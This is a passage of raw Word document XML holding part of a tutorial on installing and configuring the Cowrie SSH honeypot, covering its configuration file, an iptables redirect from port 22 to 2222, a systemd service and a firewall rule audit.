    <w:p w14:paraId="49C70922"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pip install --upgrade pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B63624"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pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047E649"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pip install --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>editable .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="515A44E0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="73DADADC" w14:textId="77777777" w:rsidR="001A7A4A" w:rsidRDefault="001A7A4A"/>
    <w:p w14:paraId="53044DC3" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58"/>
    <w:p w14:paraId="0F1134B9" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc231686548"/>
      <w:r>
        <w:t>Step 6 — Configure Cowrie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="22204D8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cp etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.cfg.dist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C4B60AD"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nano etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02C8B9DF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Find and set these two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F5E80"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hostname = webserver-prod-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C294113"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listen_endpoints</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = tcp:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2222:interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B247F4" w14:textId="037FC0E9" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cowrie binds to port 2222 by design — binding to port 22 requires root privileges, which Cowrie deliberately avoids for security isolation. The iptables PREROUTING rule in the following step transparently redirects inbound port 22 traffic to 2222, preserving the standard SSH attack surface without elevating Cowrie's privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F0B24" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="6BDB6A6C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc231686549"/>
      <w:r>
        <w:t>Step 7 — Redirect Port 22 to Cowrie's Port 2222</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5B8EA54C"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A683C63"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iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A PREROUTING -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tcp</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dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22 -j REDIRECT --to-port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE16B65"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apt install -y iptables-persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1DBD4"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netfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB4191" w14:textId="500C03CF" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The PREROUTING redirect is transparent to attackers — connection metadata and banner responses are identical to a standard SSH service, ensuring the deception layer remains undetected during initial reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEFA5F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="6167C5CF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc231686550"/>
      <w:r>
        <w:t>Step 8 — Start Cowrie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="651C7D7C"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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106FA22"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cd cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B69609"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source cowrie-env/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6AD24"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cowrie-env/bin/cowrie start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CF7B2"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cowrie-env/bin/cowrie status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C75BA7" w14:textId="53E10F99" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Expected output: cowrie is running (PID:8925)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513F667" w14:textId="47667FE7" w:rsidR="0062444D" w:rsidRDefault="001A7A4A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="2E75B6"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4245913E" wp14:editId="4F438D4B">
            <wp:extent cx="6083613" cy="1092256"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1981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26" name="Picture 19817726"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6083613" cy="1092256"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A4B76" w14:textId="00621BE4" w:rsidR="00455F63" w:rsidRPr="001A7A4A" w:rsidRDefault="00455F63">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="2E75B6"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1: Cowrie honeypot service active — PID confirmed via cowrie status command on Ubuntu Server 22.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E09401" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="39C12BA9" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="279AA1E3" w14:textId="750BE721" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc231686551"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 9 — Confirm Cowrie is Listening</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="72414BC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ss -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tlnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E058BC7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Port 2222 listed confirms the honeypot is live and accepting connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D033D3" w14:textId="28EE48B0" w:rsidR="0062444D" w:rsidRPr="006A6892" w:rsidRDefault="006A6892">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AB26BB3" wp14:editId="45535A6C">
            <wp:extent cx="6083613" cy="1816193"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89534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40180" name="Picture 895340180"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6083613" cy="1816193"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Figure 2: Port 2222 confirmed listening — honeypot accepting inbound SSH connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60FA05" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="26647FE3" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc231686552"/>
      <w:r>
        <w:t>Step 10 — Enable Cowrie Auto-Start on Reboot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="788AFAC8"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C3CA43"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nano /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/system/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20332CB5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Paste the following service definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646D05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[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3FA2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Description=Cowrie SSH Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491058F"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After=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A8F12CB"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[Service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0D967"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User=cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20310E39"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WorkingDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=/home/cowrie/cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB7754"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ExecStart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=/home/cowrie/cowrie/cowrie-env/bin/cowrie start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D8418"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ExecStop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=/home/cowrie/cowrie/cowrie-env/bin/cowrie stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D615780"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Restart=always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66879E"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[Install]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D8222"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WantedBy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=multi-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2625FBA4"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systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A337947"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systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C06332" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="188E7510" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="44577DD9" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="09A444C2" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="7ADFC16A" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc231686553"/>
    </w:p>
    <w:p w14:paraId="6C725C14" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AFE71D8" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AA5D2A" w14:textId="70A16655" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 11 — Audit Legacy Firewall Rules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="10C4F299" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>If previous honeypot software was installed, residual iptables rules may silently conflict with the new configuration. Audit and clear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B7EFE"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63C4F1"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iptables -L -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34873655" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>If a REDIRECT rule for dpt:22 is present from a previous installation, remove it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C1A1E"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iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D PREROUTING -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tcp</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dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22 -j REDIRECT --to-port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2D66E"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netfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA8F228" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Then re-add the correct rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5ECB37"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iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A PREROUTING -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tcp</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dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22 -j REDIRECT --to-port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6B8EC"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netfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
